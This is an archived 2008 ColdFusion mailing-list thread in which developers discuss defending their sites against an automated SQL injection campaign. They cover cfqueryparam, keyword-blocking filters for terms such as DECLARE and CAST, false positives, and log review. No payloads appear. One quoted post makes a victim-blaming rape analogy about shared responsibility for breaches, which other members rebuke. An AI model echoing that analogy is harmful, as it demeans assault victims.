Home of the ColdFusion Community
|
Mailing Lists
|
Home /
Groups /
ColdFusion Talk (CF-Talk)
SQL injection attack on House of Fusion
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311650
> That is, unless you concatenate SQL in your stored procedure.
>
> http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-NOT-protect-me
Perfect example, thanks!
Yeah, dunno what I was thinking... parsing that stuff would be not un-hard. =]
Ah, yes, not impossible... but screw that idea.
I'll stick to cleaning up simple queries and whatnot. :op
--
The scars of others should teach us caution.
St.
Jerome
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311643
That is, unless you concatenate SQL in your stored procedure.
http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-NOT-protect-me
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311642
----- Excess quoted text cut - see Original Post for more -----
Ah, thank you Dave! I was thinking of cfstoredproc, I reckon.
/tips hat
:Denny
--
Marriage is good for those who are afraid to sleep alone at night.
St. Jerome
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311630
> It doesn't work with stored procedures (which shouldn't
> matter, 'cause I think they are type-checked by the DB first
> anyways)
Well, not necessarily. As Mark pointed out when this thread started - it
feels like it was long, long ago - if you're calling a stored procedure from
CFQUERY you have to check your variables there too. If you're using
CFSTOREDPROC, that builds a prepared statement that calls the stored
procedure for you, and you don't have to worry about it.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311626
> Just got nailed myself - dammit - 15 years of knowledge.
There are at least 2 tools available that will search through your
code looking for unparamed variables, and I think Larry posted a
simple regex that you could use from within Eclipse. Those will help.
I actually got a little nutty and wrote my own tool, that does a bit
of database introspection, rewrites the query using the correct
cfsqldatatypes, and then tests the query. Kinda cool, wasn't too
hard, conceptually-- you have the DSN right there.
It doesn't work with stored procedures (which shouldn't matter, 'cause
I think they are type-checked by the DB first anyways), although, I
was thinking (about something Jochem said about the difficulty of
introspecting stored procedures and whatnot, sorta) that since I think
the DB will give you the source for the procedure or function, you
could use /that/ to introspect them, and create ORM type deals.
RIght?
You would have to code stuff for each DB (or at least the most popular
at first), which is a little sucky, but I think unavoidable. There
are certainly similarities between DBs tho, which would make it a tad
easier.
Probably just pie-in-the-sky type thinking, ignoring some fundamental
problem, but it sounds kind of plausible.
Anyways, half-way through coding my thing, I was like, damn, this
would have been a perfect use for ANTLR! There are even grammar files
for SQL, which would make parsing that easier. Oh well. Maybe the
next version. LOL. After I finish this one.
I'm still messing with the UI for it- uses dojo (of course) with a
nice split screen, the top half has a tree control for browsing the
files and folders with unparamed queries, and the bottom half actually
shows you the source that would change, assuming the query passes the
test. Still need to add de-select, so you can ignore directories,
files, or individual queries, and then I'll probably post a link to
it.
I started getting a little excited while coding it, thinking about
the... what was it called? Ah, yes- coding standards/review. I
remember Will had posted a tool, and I had been toying with creating a
tool for managing the attributes (hint, access, etc..) of
functions/CFCs myself... wouldn't it be nice to have a tool that would
do everything (format code, check for unvared variables, maybe even
allow for drag-and-drop moving of functions/refactoring? (Ok, that's
kinda extreme, but it was an exciting thought.)). Maybe tie it into
the SVN stuff, even? Heh.
I began thinking about getting all wiggy with it, because I wrote the
code in a pretty sloppy manner (switching between camelCase and all
lowercase, cutting/pasting functions and not changing the hint
attribute, etc.), and was like, "hell, I could tweak this tool to
tweak itself". And then every time I switched between styles, I was,
like, hey, I'm creating a test-case! LOL. Something like that.
It would be pretty easy, as it currently is, to have the tool replace
queries like "SELECT * FROM sometable" with the actual column names,
for instance, or even do things like refactor queries, changing column
or table names... I grab the DSN metadata, and parse the SQL into
table names and column names, so it's all there.
I need a bunch more "bad" query test cases, for various DB dialects,
but I'm thinking I'll link up with the group I saw at some point
(maybe it was just a blog post, now that I think about it), that's
specifically targeting the prevention of injection attacks, and see if
we can't get a nice set of cross-database testcases to use for tools
like this.
So, in the end I hope to have a source-code maintenance type tool, as
I think it sounds kind of cool. Over time, it looks like it would
become a freaking web-based IDE. :-)p
Heh... I started thinking about how I could pull off some cool
DB/query stuff within CFEclipse again, while messing around with this
stuff.
But I digress...
LOL.
:)e|\|
--
Haste is of the Devil.
St. Jerome
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311574
Open the website log with word and do a search for DECLARE
you will find a lot of entries..
Look for a filename that is in a different directory than what you
expected.. I think I got hit from a template that was in an old,
unused directory from many years ago. I recently went through the
server and deleted all of my old unused directories..
Also look for any ASP pages that are being hit..
At 06:46 AM 8/26/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311562
> Have code reviewed and wasn't my CFML (at this stage) so
> maybe a new IIS vulnerability?
I seriously doubt this has anything to do with IIS, since IIS can't interact
directly with your database.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Peter Tilbrook
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311556
Just got nailed myself - dammit - 15 years of knowledge.
Have code reviewed and wasn't my CFML (at this stage) so maybe a new IIS
vulnerability? My attack occured recently - possibly in the last 24 hours or so.
Have disabled the database and <CFABORT>ed any code that interacts with the
database until I can solve the disastrous problem (apparently the attack came
from China).
Sigh!
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311515
...
> Your main concern is not the consumption of resources as a result of an
> automated attack. That's just like any other denial of service attack,
> basically. If you can filter it out successfully, that's good for you, but
> you should be far more concerned with the results of a successful SQL
> injection attack.
Hey Dave!
Not to argue the difference between if(len()) and if(len() eq 0)... [-;)
I think DoS attacks are something to be aware of. I shudder to think
of a million error emails, and the load that puts on multiple servers,
bandwidth, etc..
DoS attacks are one of those deals, that can cascade. Like the Great
Black-out, of whatever year that was. 70-something? Or like the bank
crisis of the late 90s... Eh.
Not to lessen the injection attacks, which are more likely to cause
real damage, and are more likely to expose a security hole than DoS
(but DoS can end up exposing quite a bit too, so) yeah, just wanted to
say, the layered thing seems the way to do it.
Low level, quick stuff, and high level, (most likely) slower stuff.
For a web-app developer though (no admin responsibilities), maybe it
goes like this:
1) Sanitizing *all* user input. GiGo.
2) Avoid a self-imposed DoS, by things like error emails with no
throttle, emailed logs/huge logs on disk/in memory, or whatever.
Just wanted to sorta put emphasis on the fact that a DoS is still
something that's pretty bad, and *can* end up being as bad, or worse,
than injection attacks.
Just adding some emphasis, is all. You can DoS yourself with some of
the solutions I've seen to the injection attacks.
Not that we really have to worry, right? I'm sure we're all doing
load-testing, and part of that is testing a massive amount of errors,
right (intentional or no;)? Right?
Hahahahaha.
*sigh* someday. :-)
Man, how did I get here from trying to express the idea that one
attack can cascade into another kind of attack, or something like
that? Eh. *shrug* :-)
May your buffers never overflow,
|Den
--
Catch, then, O catch the transient hour; Improve each moment as it flies!
St. Jerome
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311513
----- Excess quoted text cut - see Original Post for more -----
That actually doesn't sound too painful. More cpu intensive compared
to what I've got now (unless my keyword blacklist keeps growing), but
pretty simple.
I get the idea of "deny, allow", but when you can cut out like 95% of
the crap with a super-fast "this is bad" type deal... hmm... my
real-world mind says go for it, while my programmer "perfect world"
mind knows it's not the "most secure" angle.
Stupid trade-offs! Wish we could "pick all three", as the saying goes.
Heh. I'm actually liking the idea of only passing ID numbers in the
url request, which would make for a simple rule. Hmm... What else
would you really need to pass besides a single token, the thread of
the web? Am I thinking screwy, or what?
Doesn't do squat for form or anywhere else, I reckon-- but what's the
percentage of form submissions vs. url requests? Eh. Guess, like all
things, it sorta depends on what you're doing, and trying to do, etc..
Thanks Jochem, I always enjoy your correspondence.
:Denny
--
Catch, then, O catch the transient hour; Improve each moment as it flies!
St. Jerome
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311467
> I've done some additional testing and have found that the prior
> version of the SQL Injection Blocker does better when challenged with
> the HP Scrawlr testing tool then the newest version. Rolling back to
> the prior release also solved the false positive problem for the three
> towns mentioned earlier.
Hhm, interesting. My own customers ran into several problems with that version,
that have been fixed with the new one. I'm not surprised it does better with
scrawlr though as for us it had way more false positives and was blocking *too*
much stuff.
Just goes to show, there's no one solution that works for everyone...and how
important it is not to rely on these tools exclusively since they clearly do not
work 100% of the time.
--- Mary Jo
Author: Matthew Smith
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311464
Mary Jo,
I've done some additional testing and have found that the prior version of the
SQL Injection Blocker does better when challenged with the HP Scrawlr testing
tool then the newest version. Rolling back to the prior release also solved the
false positive problem for the three towns mentioned earlier.
Matt
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311456
> My site has community profiles for cities and towns. The URL for these
> profiles includes the county name as well as the city or town name.
> There are Union counties in North Carolina, New Jersey and Ohio.
Or...maybe you could just get the states to rename that county. ;-)
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311455
> Can anyone suggest a modification to the code
> that would eliminate the false positives without substantially
> weakening the filter?
The one in there now is by Luis Melo and his email is in the credits. You might
want to send them along to him as I know he plans to work more on reducing the
false positives as he has time. It's definitely a challenge to make sure you
catch everything bad and let everything good through, so some false positives are
probably inevitable.
--- Mary Jo
Author: Matthew Smith
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311450
I've upgraded to the latest version of Mary Jo's tool to filter attempts at SQL
injection. It works well, but I found three interesting false positives today.
My site has community profiles for cities and towns. The URL for these profiles
includes the county name as well as the city or town name. There are Union
counties in North Carolina, New Jersey and Ohio. There are three towns that get a
false positive flag. They all start with "All" (Allenwood, Allen Center and
Allens Crossroads). The URLs have the format of /Union/Allenwood.cfm,
/Union/Allen-Center.cfm and /Union/Allens-Crossroads.cfm. Clearly, the
combination of "Union/All" is causing the problem. Can anyone suggest a
modification to the code that would eliminate the false positives without
substantially weakening the filter? The RegEx in her tool, (http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18),
is way beyond my skill set.
TIA,
Matt
...
----- Excess quoted text cut - see Original Post for more -----
Author: Sandra Clark
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311383
Funny,
I went to high school with him. Had a comp sci class with him where he
spent quite a bit of time trying to get passwords from unsuspecting people.
A while ago I read a totally rivetting book called "The Art Of
Intrusion" by Kevin D Mitnick, the legendary hacker who was sent to
jail for his intrusion exploits. He runs a security company now,
that tests you security and reports back on how well you've done.
Author: Jenny Gavin-Wear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311364
This is totally off topic in this list, but I'll make this comment and
that's an end to it.
Your expression "asked for rape" defies the logic of your argument. Asked
for rape would mean she asked for sex and would therefore be a consenting
adult, ie, not a rape victim.
Overall a really bad and totally insensitive analogy, the likes of which I
hope we never see on this list again.
Enough ............
Rick,
While your argument is well put, perhaps we could choose a slightly less
inflammatory analogy than rape. We have a large group here and I wouldn't
want anyone to be incensed by trivializing such a traumatic event (although
obviously that is not the intent).
-Mark
This would probably be more productively viewed as as "responsibility"
issue, rather than blame.
Both parties, webmaster and attacker, bear responsibility for the status of
the server/data/etc.
A negligent server/website admin bears a certain amount of responsibility
for the situation. The attacker also bears responsibility for the
consequences of the attack.
A court of law might hold only the attacker ultimately responsible.
However, the supervisor of a negligent server/website administrator would
view it as shared responsibility between the attacker and the attacked, as
in, "Why wasn't the server/website protected in the first place?"
Viewing this as a rape case, if a girl was hanging out on a street corner
and asking passers-by to rape her, then, yes, she bears some responsibility
for putting herself in that situation. It doesn't mean the one who rapes
her doesn't bear the greater responsibility for the situation, and,
therefore, punishment, but a fair judge would have to ask the girl why was
she asking passers-by to rape her in the first place.
Girls should reasonably avoid provoking rapists, and rapists should resist
their impulses.
Likewise, server/website admins should reasonably protect their servers and
websites, but hackers should avoid their impulses or share responsibility
for the situation.
Rick
Author: Jenny Gavin-Wear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311363
I'm using WhosOn, an IIS server monitor. It does an auto look up on the
location of the IP and I can also set it up to record alerts for keywords,
such as DECLARE.
www.whoson.com
Bobby, what have you been using to look up the origin of the IPs en masse?
I found a site that let's me do a handful at a time, but I don't know how
accurate the data it. It is saying the majority of my IPs originated from
the US.
~Brad
> Now look at how many of those are from Asia Pacific Network Info Centre
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311362
OK. I thought it was from you. I was sent an email with the link to SQLprev.cfm
in an email and they referenced I use your suggestion in the email as well. I
stuck the two together.> David Moore, Jr. wrote:> > I am currently using
the SQLprev.cfm from Jochem
Jochem Wrote? > The what from whom?Please don't shoot me. I am new to all
this? Sleep deprived...
~David
_________________________________________________________________
Talk to your Yahoo! Friends via Windows Live Messenger. Find out how.
http://www.windowslive.com/explore/messenger?ocid=TXT_TAGLM_WL_messenger_yahoo_082008
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311361
David Moore, Jr. wrote:
> I am currently using the SQLprev.cfm from Jochem
The what from whom?
Jochem
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311359
>Actually I am a pacifist at heart and always try to not lose my temper
(serves me well with customers, particularly the endlessly annoying ones!)
LOLOL. I am actually a moderately conservative liberal. I believe in loosing my
temper only when I know I can't find it.
> As for not knowing what cfqueryparam is and how to properly secure an
application (there's more to it than just cfqueryparam) hopefully all these
issues that people are dealing with will help such information make it's way into
even beginner CF materials, and not have it be so much of an afterthought as it
seems to have been up to this point.
On a serious note, it would have been nice that I would have been more aware when
I started coding those many years ago. I have more lines of code that need
reworking than I care to think of, but I have to start somewhere.
> --- Mary Jo
Thanks for your help today! You have been incredibly patient and kind. Now, I
must go home because my wife has called for her third and last time, which means
I am on the couch...
~David "Rock" Moore
_________________________________________________________________
Get ideas on sharing photos from people like you. Find new ways to share.
http://www.windowslive.com/explore/photogallery/posts?ocid=TXT_TAGLM_WL_Photo_Gallery_082008
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311358
Mary Jo,
Sorry. Didn't see all that. First time using this kind of post. > Here's
another "smack down" for you....it would be nice if you could remove all the
extra quoted stuff on your posts....take a look at the online web archives, it
really makes a mess of the thread! Will do better in the future. No way for me
to go in an edit that once it is posted? YUCK. Where's a good Langolier when you
need one? Thanks for the education though.
~David
P.S. I like your Smack Downs. You got GRIT! Were you wearing a cape or mask when
you wrote that SMACK!?
_________________________________________________________________
See what people are saying about Windows Live. Check out featured posts.
http://www.windowslive.com/connect?ocid=TXT_TAGLM_WL_connect2_082008
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311357
> Eric is pretty good at the Smack Down too, Eric The Great takes David
> the Geek over the ropes and into the first row of chairs! (Yes, I am
> from the South and everything references Wrestling or Nascar)
Here's another "smack down" for you....it would be nice if you could remove all
the extra quoted stuff on your posts....take a look at the online web archives,
it really makes a mess of the thread!
--- Mary Jo
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311356
> P.S. Speaking of Smack Down's. Mary Jo's got a great right cross :) Go
> get'em girl!
LOL, actually I am a pacifist at heart and always try to not lose my temper
(serves me well with customers, particularly the endlessly annoying ones!)
As for not knowing what cfqueryparam is and how to properly secure an application
(there's more to it than just cfqueryparam) hopefully all these issues that
people are dealing with will help such information make it's way into even
beginner CF materials, and not have it be so much of an afterthought as it seems
to have been up to this point.
--- Mary Jo
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311341
Don't feel bad, David. I am a freelance CF programmer. I spend most
of my time working on bug fixes or feature enhancements on code
written by others. And the vast majority of files I work on have no
<cfqueryparam.
Most of the code I work on really needs re-writing from scratch it's
so poorly written. At least in my experience, very few CF
programmers use <cfqueryparam. It's quite frightening really. Not
only is the code vulnerable to attack, it's slow, inefficent, and
often just plain wrong.
I'd say one fo the best things you have ever done as a CF programmer
is join this list and pay attention to the things clever folks like
Dave Watts have to say. Rare is the day when I dont learn something
useful on this list.
--
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311338
> When you say "Update Your Code", are you saying using
> <cfqueryparam>?
Yes. That is the only mechanism guaranteed to prevent known and future SQL
injection attacks. Using a filter can protect you from the current attack
long enough for you to fix your broken code.
> But even so, the SQL injection still will use
> up countless resources instead of cutting it off early. So,
> go back and fix 1,000's of lines of code I have developed
> over the last 'upteen' years or stop it before it starts? Is
> this something new to CF8 or just a necessary evil because of
> SQL Injection Attacks.
It's only possible to stop something before it starts if you can clearly
identify what "it" is. In this attack, for example, there are some specific
keywords that you can use in a filter: DECLARE and CAST. The next attack may
use different keywords, or different permutations of the same keywords
(using Unicode sequences instead of ASCII characters, for example).
Your main concern is not the consumption of resources as a result of an
automated attack. That's just like any other denial of service attack,
basically. If you can filter it out successfully, that's good for you, but
you should be far more concerned with the results of a successful SQL
injection attack.
> is <cfqueryparam> something a lot of programmers really use?
A lot of (arguably, almost all) competent programmers use it. Fewer
incompetent programmers use it. I'm not trying to pick a fight with you
either; I'm not calling you incompetent. But at this point, web application
programmers using almost any language should be familiar with the concept of
prepared statements (what you're building with CFQUERYPARAM) and why they're
important.
> I am afraid all I know is what I have learned from books and
> forums. This is the first I have ever heard of using <cfqueryparam>.
It's been mentioned periodically on this list for years. It's covered in the
official Adobe courseware, and in all of the CF books I've seen. That said,
I can see how you might not know about it if you don't pay relatively close
attention to all this stuff.
But with THAT said, it is your job and responsibility as a web developer to
be aware of best practices and requirements within that field. There are
PLENTY of resources about building secure web applications. Those resources
might not cover CF specifically all that much, but if you read in Open Web
Application Security Project (http://www.owasp.org/index.php/Top_10_2007),
for example, about the top ten vulnerabilities in web applications, you
would see that SQL injection is on the list and that you use prepared
statements to prevent it. Your next question should be, "how do I build a
prepared statement in ColdFusion?" You, as the web developer, are often
responsible for ALL SORTS of things that you're not going to learn in books
or forums: development issues like application security, interface issues
like usability and accessibility, business issues, deplooyment issues, etc,
etc. What's more, your responsibility may well be legally binding; in other
words, you might get sued for doing the wrong thing for a client.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more
information!
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311339
A while ago I read a totally rivetting book called "The Art Of
Intrusion" by Kevin D Mitnick, the legendary hacker who was sent to
jail for his intrusion exploits. He runs a security company now,
that tests you security and reports back on how well you've done.
He says one of the most common failures of security systems of all
kinds is that they rely on a secure perimeter. The theory is that
if we keep the hoards out of the city at the boundaries, that's all
we need to do. Unfortunately all the bad guys need is a single crack
in that outer perimeter and tehy can go wherever they like. So his
hacking attempts usually meant hunting for some hole in the wall, and
once through that hole the entire enterprise was laid out for the
taking.
He'd find a router left online but unsecure by some lazy support
person who wanted to be able to work from home. Or a long-forgotten
modem somewhere, and once through that security hole, there were no
other security blockers and teh whole network was his for the raping
and pillaging.
The lesson we learn from this? Dont rely on only one defense
mechanism. All it takes is one crack in that armour and you're dead.
You need to use all the weapons you have at your disposal. In this
case, we need to use the Regex blockers, <cfqueryparam, strong
passwords, regular password changing, separate physical machines
for web and database - everything you can think of to make it more
difficult for the attackers.
That book was a great read on its own, but a real education for me as
a web developer. i heartily recommend it. The opening chapter is
highly amusing - where he is hired to probe security at a company, and
at the review meeting where he presented his report, he said 'yes i
managed to get in and managed to get some unauthorised access. And
i think you should have done a better job on your applicatoin for a
raise. And did you know you are being paid less than others of
equivalent rank in your company? Oh and the profits you're going to
report next month are x xx xx .. you have a secretary who is having
an affair with one of your senior execs." When their mouths gaped
open he finished it with the clincher .. "oh and this PC i'm using for
the presentation - it's yours. Your security manager gave it to me,
along with remote admin access to you network, and i have been working
remotely through your network for the past month."
A fantastic read.
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311337
Consider me connected. At the same time, I will try not to just suck the life out
of the list and provide substance where I can. I was a morning radio announcer
for 20 years before becoming a web programmer, so if you can't remember the name
of that song or artist - just ask. :)
As for the can o' worms. If you're ever in Spartanburg, SC, just bring 'em along
and I can show you some really nice fishin!
Seriously, thanks everyone!
~David G. Moore, Jr.> Subject: Re: SQL injection attack on House of Fusion>
From: jscott@gravityfree.com> To: cf-talk@houseoffusion.com> Date: Wed, 20
Aug 2008 18:17:34 -0400> > > I certainly don't feel picked on. I feel
blessed to have a place where I can learn from people who do know so much. And
you are right. I (we) only seem to learn under fire. I am a one man business
owner in a small town with limited resources and time. 10 hour days, work
weekends, what is family time except coaching baseball-soccer-basketball, and I
have forgotten what sleep even is. So, what do we do?> > Well, the first
step is getting more connected to the community, being > exposed to different
styles, and being on a list such as this one is a > great start. Presentations
at user groups can also cover topics such as > this if you have one near your
area.> > > So, what is PCI-DSS (he asks sheepishly) or is that a whole
nother Post????> > In short, PCI-DSS is the Payment Card Industry Data
Security Standard. > It is required for any merchant who accepts, processes,
handles, stores, > or transmits credit card or debit card information. It
isn't law, but > your merchant account (or those of your clients) will have
provisions in > their contracts that require compliance with these rules. You
can read > more about it at:> > https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml>;
> That's another whole can o' worms though.> > > -Justin Scott>
> > >
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311336
> So, I have found like the "Mother Load" of good programmers who really care
about Cold Fusion and take the time to do it right?
Pretty much. The skill level on the list varies from "can express the
meaning of life in ColdFusion" to "what's a database" so your experience
may vary. I'd like to think that everyone here, including me, is
looking to learn through the experience of others, so you're in the
right place. Welcome!
-Justin Scott
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311335
> I certainly don't feel picked on. I feel blessed to have a place where I can
learn from people who do know so much. And you are right. I (we) only seem to
learn under fire. I am a one man business owner in a small town with limited
resources and time. 10 hour days, work weekends, what is family time except
coaching baseball-soccer-basketball, and I have forgotten what sleep even is. So,
what do we do?
Well, the first step is getting more connected to the community, being
exposed to different styles, and being on a list such as this one is a
great start. Presentations at user groups can also cover topics such as
this if you have one near your area.
> So, what is PCI-DSS (he asks sheepishly) or is that a whole nother Post????
In short, PCI-DSS is the Payment Card Industry Data Security Standard.
It is required for any merchant who accepts, processes, handles, stores,
or transmits credit card or debit card information. It isn't law, but
your merchant account (or those of your clients) will have provisions in
their contracts that require compliance with these rules. You can read
more about it at:
https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml
That's another whole can o' worms though.
-Justin Scott
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311334
So, I have found like the "Mother Load" of good programmers who really care about
Cold Fusion and take the time to do it right? Becuase every peice of code I have
ever gotten from Adobe Exchange or Purchase from other sites has never had
<cfqueryparam>. And I know Ben is going to shoot me, because looking back
at some of his Advanced books now I see where he says I should be using it.
I guess my 10 hour days just turned into 14 hours. Anybody got a Starbucks
Supersize Java Java Double Caffeine coupon?
Eric is pretty good at the Smack Down too, Eric The Great takes David the Geek
over the ropes and into the first row of chairs! (Yes, I am from the South and
everything references Wrestling or Nascar)
~David> Subject: Re: SQL injection attack on House of Fusion> From:
cftalk@ecartech.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008
16:59:26 -0500> > >is <cfqueryparam> something a lot of
programmers really use?> > > Only the good ones. ;)> > >
Thanks,> > Eric> > David Moore, Jr. wrote:> > When you say
"Update Your Code", are you saying using <cfqueryparam>? But even so, the
SQL injection still will use up countless resources instead of cutting it off
early. So, go back and fix 1,000's of lines of code I have developed over the
last 'upteen' years or stop it before it starts? Is this something new to CF8 or
just a necessary evil because of SQL Injection Attacks. > > > > Not
trying to pick a fight, becuase I am sure you have forgotten more code than I
will ever know (seriously) and I am probably just being lazy (seriously), but is
<cfqueryparam> something a lot of programmers really use? I have never seen
<cfqueryparam> used on any tags I have purchased or exchanged and I am
afraid all I know is what I have learned from books and forums. This is the first
I have ever heard of using <cfqueryparam>.> > > > ~David G.
Moore, Jr.> Subject: Re: SQL injection attack on House of Fusion> From:
jscott@gravityfree.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug
2008 17:01:42 -0400> > > I am currently using the SQLprev.cfm from
Jochem to stop the onslaught of superfluous bandwidth suckage from my server, but
was wondering what the difference would be with this one. I am not looking to
start a "my SQL Injection blocker is better than yours", yet trying to educate
myself on just what is going on and what is best to do. > > My original
SQLprev script (http://www.gravityfree.com/_sqlprev.cfm.txt)
> just checks for basic SQL keywords with a semicolon in URL variables. >
It's a quick and dirty way to give you some protection from bots > short-term
while your code base is updated to use best practices and > secure coding
methods. Mary Jo's is more thorough in that it checks > additional variable
scopes, and can help protect better against > hand-drafted attacks, but may
have a higher p> otential for false > positives (though it's improved
recently from what I can tell).> > SQLPrev has a version compatible with
CF5 for those who need it where > the other script relies on CFMX functions to
run. I'm not saying one is > better than the other, they both get the job
done. Just use whatever > works best for you, and update your code so that you
don't need either > of them <g>.> > > -Justin Scott> >
> > > > > > > >
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311333
Well, it is my goal :) not there yet...> Subject: Re: SQL injection attack on
House of Fusion> From: cftalk@ecartech.com> To:
cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008 16:59:26 -0500> >
>is <cfqueryparam> something a lot of programmers really use?> >
> Only the good ones. ;)> > > Thanks,> > Eric> > David
Moore, Jr. wrote:> > When you say "Update Your Code", are you saying using
<cfqueryparam>? But even so, the SQL injection still will use up countless
resources instead of cutting it off early. So, go back and fix 1,000's of lines
of code I have developed over the last 'upteen' years or stop it before it
starts? Is this something new to CF8 or just a necessary evil because of SQL
Injection Attacks. > > > > Not trying to pick a fight, becuase I am
sure you have forgotten more code than I will ever know (seriously) and I am
probably just being lazy (seriously), but is <cfqueryparam> something a lot
of programmers really use? I have never seen <cfqueryparam> used on any
tags I have purchased or exchanged and I am afraid all I know is what I have
learned from books and forums. This is the first I have ever heard of using
<cfqueryparam>.> > > > ~David G. Moore, Jr.> Subject: Re:
SQL injection attack on House of Fusion> From: jscott@gravityfree.com> To:
cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008 17:01:42 -0400> > >
I am currently using the SQLprev.cfm from Jochem to stop the onslaught of
superfluous bandwidth suckage from my server, but was wondering what the
difference would be with this one. I am not looking to start a "my SQL Injection
blocker is better than yours", yet trying to educate myself on just what is going
on and what is best to do. > > My original SQLprev script (http://www.gravityfree.com/_sqlprev.cfm.txt) > just checks
for basic SQL keywords with a semicolon in URL variables. > It's a quick and
dirty way to give you some protection from bots > short-term while your code
base is updated to use best practices and > secure coding methods. Mary Jo's
is more thorough in that it checks > additional variable scopes, and can help
protect better against > hand-drafted attacks, but may have a higher p>
otential for false > positives (though it's improved recently from what I can
tell).> > SQLPrev has a version compatible with CF5 for those who need it
where > the other script relies on CFMX functions to run. I'm not saying one
is > better than the other, they both get the job done. Just use whatever >
works best for you, and update your code so that you don't need either > of
them <g>.> > > -Justin Scott> > > > > > >
> > >
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311332
The only way I found the SQL Injection Attack was my server kept crawling to a
dead hault. I looked in SeeFusion (some softwear I purchased that lets me see
what is going on live with the websites) and I noticed that the sites Total Time
just kept going up and never resolving, basically every website coming to a hault
and bringing my server to a scretching hault. I would reboot CF to get it to
unlock. After a scan of Cold Fusion logfiles application.cfm file, I saw this
weird URL string and thus my search landed me here.
Whether or not that is what was or is bringing my server to a hault, I don't know
- but I can only hope. I am pretty sure it has something to do with the (don't
everyone scream all at once) 45 access databases I am using to run the individual
websites off of or not, but just maybe.
~ David G. Moore, Jr.
P.S. Can't wait to see everyone's response to this one? I am pretty sure I am
about to get another SMACK DOWN...> Subject: RE: SQL injection attack on House
of Fusion> From: dwatts@figleaf.com> To: cf-talk@houseoffusion.com>
Date: Wed, 20 Aug 2008 17:59:23 -0400> > > Does this thing just raise
it's ugly head every now and then > > and go away for a while? This is the
